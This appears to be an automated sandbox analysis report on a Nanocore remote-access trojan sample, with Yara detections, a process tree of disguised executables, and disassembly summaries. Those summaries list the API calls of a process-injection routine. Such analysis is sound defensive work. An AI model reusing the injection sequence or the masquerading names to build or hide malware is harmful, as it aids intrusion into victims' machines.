                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000003.209991404.00000000010E7000.00000004.00000001.sdmp, Author: Florian Roth
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000003.209991404.00000000010E7000.00000004.00000001.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000000.00000003.209991404.00000000010E7000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000003.209808084.0000000001147000.00000004.00000001.sdmp, Author: Florian Roth
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000003.209808084.0000000001147000.00000004.00000001.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000000.00000003.209808084.0000000001147000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000003.209532145.0000000001114000.00000004.00000001.sdmp, Author: Florian Roth
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000003.209532145.0000000001114000.00000004.00000001.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000000.00000003.209532145.0000000001114000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000003.210637735.000000000106B000.00000004.00000001.sdmp, Author: Florian Roth
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000003.210637735.000000000106B000.00000004.00000001.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000000.00000003.210637735.000000000106B000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000003.210116902.00000000010E7000.00000004.00000001.sdmp, Author: Florian Roth
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000003.210116902.00000000010E7000.00000004.00000001.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000000.00000003.210116902.00000000010E7000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000003.210229940.0000000001114000.00000004.00000001.sdmp, Author: Florian Roth
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000003.210229940.0000000001114000.00000004.00000001.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000000.00000003.210229940.0000000001114000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  Reputation:low

                                                  Chronological Activities

                                                  Analysis Process: RegAsm.exe PID: 5656 Parent PID: 576

                                                  General

                                                  Start time:07:24:00
                                                  Start date:20/11/2020
                                                  Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
                                                  Imagebase:0x660000
                                                  File size:53248 bytes
                                                  MD5 hash:529695608EAFBED00ACA9E61EF333A7C
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Reputation:high

                                                  Chronological Activities

                                                  Analysis Process: DiagnosticsHub.StandardCollector.Service.exe.bat PID: 5944 Parent PID: 3388

                                                  General

                                                  Start time:07:24:07
                                                  Start date:20/11/2020
                                                  Path:C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat
                                                  Wow64 process (32bit):true
                                                  Commandline:'C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat'
                                                  Imagebase:0x3c0000
                                                  File size:1124928 bytes
                                                  MD5 hash:F660ED54597E4FF5354B557329CAB70D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000003.255242846.0000000000FA4000.00000004.00000001.sdmp, Author: Florian Roth
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000003.255242846.0000000000FA4000.00000004.00000001.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000002.00000003.255242846.0000000000FA4000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000003.254683276.0000000001181000.00000004.00000001.sdmp, Author: Florian Roth
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000003.254683276.0000000001181000.00000004.00000001.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000002.00000003.254683276.0000000001181000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000003.231856687.000000000112F000.00000004.00000001.sdmp, Author: Florian Roth
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000003.231856687.000000000112F000.00000004.00000001.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000002.00000003.231856687.000000000112F000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000003.230915051.0000000001129000.00000004.00000001.sdmp, Author: Florian Roth
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000003.230915051.0000000001129000.00000004.00000001.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000002.00000003.230915051.0000000001129000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000003.231281467.0000000001180000.00000004.00000001.sdmp, Author: Florian Roth
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000003.231281467.0000000001180000.00000004.00000001.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000002.00000003.231281467.0000000001180000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000003.230856862.00000000011B4000.00000004.00000001.sdmp, Author: Florian Roth
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000003.230856862.00000000011B4000.00000004.00000001.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000002.00000003.230856862.00000000011B4000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000003.254526561.00000000011E6000.00000004.00000001.sdmp, Author: Florian Roth
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000003.254526561.00000000011E6000.00000004.00000001.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000002.00000003.254526561.00000000011E6000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000003.254613953.00000000011B3000.00000004.00000001.sdmp, Author: Florian Roth
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000003.254613953.00000000011B3000.00000004.00000001.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000002.00000003.254613953.00000000011B3000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000003.254797061.0000000000F9F000.00000004.00000001.sdmp, Author: Florian Roth
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000003.254797061.0000000000F9F000.00000004.00000001.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000002.00000003.254797061.0000000000F9F000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000003.231188805.0000000001154000.00000004.00000001.sdmp, Author: Florian Roth
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000003.231188805.0000000001154000.00000004.00000001.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000002.00000003.231188805.0000000001154000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000003.232736755.0000000000E62000.00000040.00000001.sdmp, Author: Florian Roth
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000003.232736755.0000000000E62000.00000040.00000001.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000002.00000003.232736755.0000000000E62000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000003.231305365.0000000001181000.00000004.00000001.sdmp, Author: Florian Roth
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000003.231305365.0000000001181000.00000004.00000001.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000002.00000003.231305365.0000000001181000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000003.231549555.00000000010FD000.00000004.00000001.sdmp, Author: Florian Roth
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000003.231549555.00000000010FD000.00000004.00000001.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000002.00000003.231549555.00000000010FD000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000003.231711637.00000000010FD000.00000004.00000001.sdmp, Author: Florian Roth
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000003.231711637.00000000010FD000.00000004.00000001.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000002.00000003.231711637.00000000010FD000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  Antivirus matches:
                                                  • Detection: 100%, Avira
                                                  Reputation:low

                                                  Chronological Activities

                                                  Analysis Process: RegAsm.exe PID: 4332 Parent PID: 5944

                                                  General

                                                  Start time:07:24:10
                                                  Start date:20/11/2020
                                                  Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
                                                  Imagebase:0x7ff7488e0000
                                                  File size:53248 bytes
                                                  MD5 hash:529695608EAFBED00ACA9E61EF333A7C
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Yara matches:
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000003.00000002.249609796.0000000000402000.00000020.00000001.sdmp, Author: Florian Roth
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000003.00000002.249609796.0000000000402000.00000020.00000001.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000003.00000002.249609796.0000000000402000.00000020.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000003.00000002.250629843.0000000004451000.00000004.00000001.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000003.00000002.250629843.0000000004451000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000003.00000002.250595233.0000000003451000.00000004.00000001.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000003.00000002.250595233.0000000003451000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  Reputation:high

                                                  Chronological Activities

                                                  Analysis Process: dhcpmon.exe PID: 5860 Parent PID: 3388

                                                  General

                                                  Start time:07:24:21
                                                  Start date:20/11/2020
                                                  Path:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe'
                                                  Imagebase:0x500000
                                                  File size:53248 bytes
                                                  MD5 hash:529695608EAFBED00ACA9E61EF333A7C
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Antivirus matches:
                                                  • Detection: 0%, Metadefender, Browse
                                                  • Detection: 0%, ReversingLabs
                                                  Reputation:high

                                                  Chronological Activities

                                                  Analysis Process: conhost.exe PID: 3688 Parent PID: 5860

                                                  General

                                                  Start time:07:24:21
                                                  Start date:20/11/2020
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6b2800000
                                                  File size:625664 bytes
                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  Chronological Activities

                                                  Disassembly

                                                  Code Analysis

                                                  Reset < >

                                                    Analysis Process: d4e475d7d17a16be8b9eeac6e10b25af.exe PID: 576 Parent PID: 5772 d4e475d7d17a16be8b9eeac6e10b25af.exeCOMMON

                                                    Executed Functions

                                                    Function 038D00BE, Relevance: 18.4, APIs: 12, Instructions: 393threadinjectionmemoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateProcessW.KERNELBASE(?,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 038D02E7
                                                    • GetThreadContext.KERNELBASE(?,00010007), ref: 038D02FC
                                                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 038D031C
                                                    • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 038D034A
                                                    • VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040), ref: 038D0367
                                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,00000000), ref: 038D049B
                                                    • VirtualProtectEx.KERNELBASE(?,?,?,00000002,?), ref: 038D04B5
                                                    • VirtualProtectEx.KERNELBASE(?,?,?,00000001,?), ref: 038D051C
                                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 038D053E
                                                    • WriteProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 038D055D
                                                    • SetThreadContext.KERNELBASE(?,00010007), ref: 038D057E
                                                    • ResumeThread.KERNELBASE(?), ref: 038D058C
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000003.211922744.00000000038D0000.00000040.00000001.sdmp, Offset: 038D0000, based on PE: false
                                                    Similarity
                                                    • API ID: Virtual$Process$MemoryThread$AllocContextProtectWrite$CreateFreeReadResume
                                                    • String ID:
                                                    • API String ID: 12256240-0
                                                    • Opcode ID: f12a0e3ec3a1dc5db5e035ccf4192a676492458e181c44b55a32febd4ba72111
                                                    • Instruction ID: 12b9c41b9fab8c4745d3e05e54124a090a02469fef686c23b373b31c2b523749
                                                    • Opcode Fuzzy Hash: f12a0e3ec3a1dc5db5e035ccf4192a676492458e181c44b55a32febd4ba72111
                                                    • Instruction Fuzzy Hash: CBF113B1D00219ABDB25CFA5C844BAEFBB9FF48704F1844A9E949E7240D730AA84CF50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Non-executed Functions

                                                    Analysis Process: DiagnosticsHub.StandardCollector.Service.exe.bat PID: 5944 Parent PID: 3388 DiagnosticsHub.StandardCollector.Service.exe.batCOMMON

                                                    Executed Functions

                                                    Function 003E33C7, Relevance: 120.9, APIs: 35, Strings: 34, Instructions: 194libraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • RtlEncodePointer.NTDLL(00000000), ref: 003E33CA
                                                      • Part of subcall function 003EA764: EncodePointer.KERNEL32(003EA730,0047BE68,00000008,003F4D5C), ref: 003EA769
                                                    • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 003EA0E0
                                                    • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 003EA0F4
                                                    • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 003EA107
                                                    • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 003EA11A
                                                    • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 003EA12D
                                                    • GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 003EA140
                                                    • GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 003EA153
                                                    • GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 003EA166
                                                    • GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 003EA179
                                                    • GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 003EA18C
                                                    • GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 003EA19F
                                                    • GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 003EA1B2
                                                    • GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 003EA1C5
                                                    • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 003EA1D8
                                                    • GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 003EA1EB
                                                    • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 003EA1FE
                                                    • GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 003EA211
                                                    • GetProcAddress.KERNEL32(00000000,FreeLibraryWhenCallbackReturns), ref: 003EA224
                                                    • GetProcAddress.KERNEL32(00000000,GetCurrentProcessorNumber), ref: 003EA237
                                                    • GetProcAddress.KERNEL32(00000000,GetLogicalProcessorInformation), ref: 003EA24A
                                                    • GetProcAddress.KERNEL32(00000000,CreateSymbolicLinkW), ref: 003EA25D
                                                    • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 003EA270
                                                    • GetProcAddress.KERNEL32(00000000,EnumSystemLocalesEx), ref: 003EA283
                                                    • GetProcAddress.KERNEL32(00000000,CompareStringEx), ref: 003EA296
                                                    • GetProcAddress.KERNEL32(00000000,GetDateFormatEx), ref: 003EA2A9
                                                    • GetProcAddress.KERNEL32(00000000,GetLocaleInfoEx), ref: 003EA2BC
                                                    • GetProcAddress.KERNEL32(00000000,GetTimeFormatEx), ref: 003EA2CF
                                                    • GetProcAddress.KERNEL32(00000000,GetUserDefaultLocaleName), ref: 003EA2E2
                                                    • GetProcAddress.KERNEL32(00000000,IsValidLocaleName), ref: 003EA2F5
                                                    • GetProcAddress.KERNEL32(00000000,LCMapStringEx), ref: 003EA308
                                                    • GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 003EA31B
                                                    • GetProcAddress.KERNEL32(00000000,GetTickCount64), ref: 003EA32E
                                                    • GetProcAddress.KERNEL32(00000000,GetFileInformationByHandleExW), ref: 003EA341
                                                    • GetProcAddress.KERNEL32(00000000,SetFileInformationByHandleW), ref: 003EA354
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: AddressProc$EncodePointer$HandleModule
                                                    • String ID: CloseThreadpoolTimer$CloseThreadpoolWait$CompareStringEx$CreateEventExW$CreateSemaphoreExW$CreateSymbolicLinkW$CreateThreadpoolTimer$CreateThreadpoolWait$EnumSystemLocalesEx$FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$FlushProcessWriteBuffers$FreeLibraryWhenCallbackReturns$GetCurrentPackageId$GetCurrentProcessorNumber$GetDateFormatEx$GetFileInformationByHandleExW$GetLocaleInfoEx$GetLogicalProcessorInformation$GetTickCount64$GetTimeFormatEx$GetUserDefaultLocaleName$InitializeCriticalSectionEx$IsValidLocaleName$LCMapStringEx$SetDefaultDllDirectories$SetFileInformationByHandleW$SetThreadStackGuarantee$SetThreadpoolTimer$SetThreadpoolWait$WaitForThreadpoolTimerCallbacks$kernel32.dll
                                                    • API String ID: 2375030495-2934716456
                                                    • Opcode ID: a8b484b45ecc0505598a9d3194b77d4eb017959633e74b016f0f00d75828b2c2
                                                    • Instruction ID: 387b353ef959ce57a71b5338962a79d178d85e997cdaa8477dad05b60c38f7b1
                                                    • Opcode Fuzzy Hash: a8b484b45ecc0505598a9d3194b77d4eb017959633e74b016f0f00d75828b2c2
                                                    • Instruction Fuzzy Hash: 6861FB71D50719AAC311EFB5EC49F1BBBA8BB55B42714083FA805E3171EAB8A1488F5C
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003C3B4C, Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 159windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,003C49C2,?), ref: 003C3B7A
                                                    • IsDebuggerPresent.KERNEL32(?,?,?,003C49C2,?), ref: 003C3B8C
                                                    • GetFullPathNameW.KERNEL32(00007FFF,?,?,004862F8,004862E0,?,?,?,003C49C2,?), ref: 003C3BFD
                                                      • Part of subcall function 003D0A8D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,003C3C26,004862F8,?,?,?,?,003C49C2,?), ref: 003D0ACE
                                                    • SetCurrentDirectoryW.KERNEL32(?,?,003C49C2,?), ref: 003C3C81
                                                    • MessageBoxA.USER32 ref: 003FD4BC
                                                    • SetCurrentDirectoryW.KERNEL32(?,004862F8,?,?,?,?,003C49C2,?), ref: 003FD4F4
                                                    • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00475D40,004862F8,?,?,?,?,003C49C2,?), ref: 003FD57A
                                                    • ShellExecuteW.SHELL32(00000000,?,?,?,003C49C2,?), ref: 003FD581
                                                      • Part of subcall function 003C3A58: GetSysColorBrush.USER32(0000000F), ref: 003C3A62
                                                      • Part of subcall function 003C3A58: LoadCursorW.USER32(00000000,00007F00), ref: 003C3A71
                                                      • Part of subcall function 003C3A58: LoadIconW.USER32(00000063), ref: 003C3A88
                                                      • Part of subcall function 003C3A58: LoadIconW.USER32(000000A4), ref: 003C3A9A
                                                      • Part of subcall function 003C3A58: LoadIconW.USER32(000000A2), ref: 003C3AAC
                                                      • Part of subcall function 003C3A58: LoadImageW.USER32 ref: 003C3AD2
                                                      • Part of subcall function 003C3A58: RegisterClassExW.USER32 ref: 003C3B28
                                                      • Part of subcall function 003C39E7: CreateWindowExW.USER32 ref: 003C3A15
                                                      • Part of subcall function 003C39E7: CreateWindowExW.USER32 ref: 003C3A36
                                                      • Part of subcall function 003C39E7: ShowWindow.USER32(00000001,?,?,?,003C49C2,?), ref: 003C3A4A
                                                      • Part of subcall function 003C39E7: ShowWindow.USER32(00000001,?,?,?,003C49C2,?), ref: 003C3A53
                                                      • Part of subcall function 003C43DB: Shell_NotifyIconW.SHELL32(?,?), ref: 003C44A6
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell_
                                                    • String ID: This is a third-party compiled AutoIt script.$runas$%E
                                                    • API String ID: 1385234928-2935453162
                                                    • Opcode ID: 8fbe75436a3788f1b020ea4d992c9c781732a2f4be72c078ce3c5eabf9f0cc2d
                                                    • Instruction ID: 22f44a614ed3e93f732d8a7ae0a2294c50666b04d36785a3e15ef66cfe215468
                                                    • Opcode Fuzzy Hash: 8fbe75436a3788f1b020ea4d992c9c781732a2f4be72c078ce3c5eabf9f0cc2d
                                                    • Instruction Fuzzy Hash: 0051D431904248AACB13BBB0EC05FFD7B78AB05300B11C5FEF855EA192CA758E45CB25
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00E300BE, Relevance: 18.4, APIs: 12, Instructions: 393threadinjectionmemoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateProcessW.KERNELBASE(?,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00E302E7
                                                    • GetThreadContext.KERNELBASE(?,00010007), ref: 00E302FC
                                                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00E3031C
                                                    • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 00E3034A
                                                    • VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040), ref: 00E30367
                                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,00000000), ref: 00E3049B
                                                    • VirtualProtectEx.KERNELBASE(?,?,?,00000002,?), ref: 00E304B5
                                                    • VirtualProtectEx.KERNELBASE(?,?,?,00000001,?), ref: 00E3051C
                                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00E3053E
                                                    • WriteProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00E3055D
                                                    • SetThreadContext.KERNELBASE(?,00010007), ref: 00E3057E
                                                    • ResumeThread.KERNELBASE(?), ref: 00E3058C
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000003.232895997.0000000000E30000.00000040.00000001.sdmp, Offset: 00E30000, based on PE: false
                                                    Similarity
                                                    • API ID: Virtual$Process$MemoryThread$AllocContextProtectWrite$CreateFreeReadResume
                                                    • String ID:
                                                    • API String ID: 12256240-0
                                                    • Opcode ID: f12a0e3ec3a1dc5db5e035ccf4192a676492458e181c44b55a32febd4ba72111
                                                    • Instruction ID: d22c3ec7caecec380ba81bd89fc58741df439d16674c51f6c3f19271b573d6ed
                                                    • Opcode Fuzzy Hash: f12a0e3ec3a1dc5db5e035ccf4192a676492458e181c44b55a32febd4ba72111
                                                    • Instruction Fuzzy Hash: 8BF125B1D00219AFDB21CFA5CC58BAEBBB9FF48704F1454A9E959B7250D730AA84CF50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003C4AFE, Relevance: 10.7, APIs: 7, Instructions: 230COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetVersionExW.KERNEL32(?,?,00000000), ref: 003C4B2B
                                                    • GetCurrentProcess.KERNEL32(?,0044FAEC,00000000,00000000,?,?,00000000), ref: 003C4BF8
                                                    • IsWow64Process.KERNEL32(00000000,?,00000000), ref: 003C4BFF
                                                    • GetNativeSystemInfo.KERNELBASE(00000000,?,00000000), ref: 003C4C45
                                                    • FreeLibrary.KERNEL32(00000000,?,00000000), ref: 003C4C50
                                                    • GetSystemInfo.KERNEL32(00000000,?,00000000), ref: 003C4C81
                                                    • GetSystemInfo.KERNEL32(00000000,?,00000000), ref: 003C4C8D
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
